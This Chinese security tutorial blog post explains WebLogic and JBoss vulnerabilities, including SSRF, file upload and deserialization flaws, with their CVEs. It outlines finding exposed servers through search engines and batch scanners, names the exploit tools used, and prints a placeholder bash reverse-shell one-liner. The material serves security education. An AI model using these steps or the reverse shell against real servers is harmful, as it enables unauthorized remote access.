当前位置: 首页 > news >正文

网安系列【16】之Weblogic和jboss漏洞

文章目录

  • 一 Weblogic
    • 1.1 Weblogic相关漏洞
    • 1.2 Weblogic漏洞发现
    • 1.3 Weblogic漏洞利用
  • 二 Jboss
    • 2.1 Jboss漏洞
    • 2.2 Jboss识别与漏洞利用

一 Weblogic

  • WebLogic 是由 Oracle公司 开发的一款基于Java EE(现称Jakarta EE)的企业级应用服务器,主要用于部署、运行和管理分布式Web应用、企业应用和微服务。
  • 优势:成熟稳定,适合大规模关键业务、深度集成Oracle数据库及其他中间件(如SOA Suite)。
    劣势:配置复杂,学习曲线陡峭、资源占用较高,成本昂贵(相比开源替代品如WildFly/TomEE)。
    在这里插入图片描述

1.1 Weblogic相关漏洞

在这里插入图片描述


主要受影响版本:
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.1
Weblogic 12.2.1.2
Weblogic 12.2.1.3
Weblogic 14.1.1.0


  • 弱口令:Weblogic存在管理后台,通过账号密码登录,由于管理员的疏忽,经常会使用弱口令,或者默认的账户名密码。
  • SSRF漏洞(CVE-2014-4210):Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而可以攻 击内网中redis、fastcgi等脆弱组件。
  • SSRF(Server-Side Request Forgery,服务器端请求伪造)。SSRF是一种安全漏洞,攻击者诱使服务器向内部或外部的非预期系统发起恶意请求,从而绕过访问控制、探测内网或攻击其他服务。
  • 漏洞原理
    1. 攻击者控制目标服务器的请求目标:通过篡改URL、参数或文件上传等功能,让服务器代替攻击者访问内网资源、第三方系统或敏感接口。
    2. 服务器的高权限:服务器通常能访问内网(如数据库、管理后台),而外部用户无法直接到达这些资源。
  • 任意文件上传漏洞 (CVE-2018-2894):Web ServiceTestPage 在"生产模式”下默认不开启,所以该漏洞有一定限制。“利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。
  • XML Dec0der反序列化漏洞(CVE-2017-10271):Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
  • Java反序列化漏洞(CVE-2018-2628):Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授 权的用户在远程服务器执行任意命令。

1.2 Weblogic漏洞发现

  1. 获取资产:shodan、fofa、钟馗之眼等,app="BEA-WebLogic-Server"。 google hackhing inurl:漏洞地址intitle:weblogic等。
  2. 批量扫描脚本:WeblogicScan。
  3. 漏洞路径:_async/AsyncResponseService
    在这里插入图片描述
    在这里插入图片描述

1.3 Weblogic漏洞利用


验证扫描结果(执行命令and反弹shell)

  • 执行扫描命令python3 WeblogicScan -f target.txt,然后利用Java反序列化漏洞利用工具,选择发现的漏洞类型和服务器的地址,进行检查,即可实现命令执行。
    在这里插入图片描述
    在这里插入图片描述
  • 反弹shell
bash -i >& /dev/tcp/ip/port 0>&1

在这里插入图片描述

二 Jboss

  • JBoss(现称 WildFly)是一款开源的、基于Java EE(现Jakarta EE)的应用服务器,由Red Hat公司开发和维护。它用于部署和管理企业级Java应用(如Web服务、分布式系统等),提供高性能、模块化架构和丰富的企业功能。
组件功能说明
Undertow高性能Web服务器(默认替代Tomcat),支持HTTP/2和WebSocket。
Hibernate集成ORM框架,简化数据库操作。
Infinispan分布式缓存系统,用于集群会话共享。
Arquillian测试框架,支持容器内自动化测试。
Management Console Web管理界面(默认端口9990),监控和配置服务器。

2.1 Jboss漏洞


Jboss历史漏洞 (反序列化漏洞)

  • JBoss JMXlnvokerServlet 反序列化漏洞 (CVE-2015-7501)
  • JBossEJBlnvokerServlet反序列化漏洞
  • JBosS AS 6.X 反序列化漏洞(CVE-2017-12149)
  • JBoss 4.xJBossMQJMS 反序列化漏洞(CVE-2017-7504)

Jboss历史漏洞 (访问控制不严导致的漏洞)

  • JMXConsole未授权访问Getshell
  • JMX Console HtmlAdaptor Getshell (CVE-2007-1036)
  • JMX控制台安全验证绕过漏洞(CVE-2010-0738) Administration
  • Console 弱口令 Getshell

2.2 Jboss识别与漏洞利用

  1. Jboss漏洞检测(批量):jbossScan
    在这里插入图片描述
  • CVE-2017-12149漏洞检测:http://ip:8080/invoker/readonly访问该url,若显示状态码为500的报错界面,则证明漏洞存在。
  • CVE-2017-12149漏洞概述:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 Httplnvoker 组件中ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
  • CVE-2017-12149漏洞利用(反弹shell):工具https://github.com/joaomatosf/jexboss。
http://www.lryc.cn/news/584051.html

相关文章:

  • Linux驱动06 --- UDP
  • 货车车架和悬架设计cad【7张】+设计说明书
  • 前端面试专栏-算法篇:21. 链表、栈、队列的实现与应用
  • 分布式ID 与自增区别
  • 【spring boot】三种日志系统对比:ELK、Loki+Grafana、Docker API
  • 膨胀卷积介绍
  • XGBoosting算法详解(Boosting思想的代表算法)
  • 字节 Seed 团队联合清华大学智能产业研究院开源 MemAgent: 基于多轮对话强化学习记忆代理的长文本大语言模型重构
  • 深度学习中的常见损失函数详解及PyTorch实现
  • PyTorch Tensor 操作入门:转换、运算、维度变换
  • pytorch 神经网络
  • PyTorch自动微分:从基础到实战
  • 【Pandas】pandas DataFrame from_records
  • 【PyTorch】PyTorch中的数据预处理操作
  • 杰赛S65_中星微ZX296716免拆刷机教程解决网络错误和时钟问题
  • RocketMQ安装(Windows环境)
  • 零成本实现商品图换背景
  • 特征筛选步骤
  • 计算机视觉 之 数字图像处理基础
  • NAT技术(网络地址转换)
  • IPv4和IPv6双栈配置
  • CRT 不同会导致 fopen 地址不同
  • 飞书AI技术体系
  • Java 正则表达式白皮书:语法详解、工程实践与常用表达式库
  • OSPF协议:核心概念与配置要点解析
  • 栈题解——有效的括号【LeetCode】两种方法
  • ACL协议:核心概念与配置要点解析
  • LlamaFactory Demo
  • 强缓存和协商缓存详解
  • SQL进阶:自连接的用法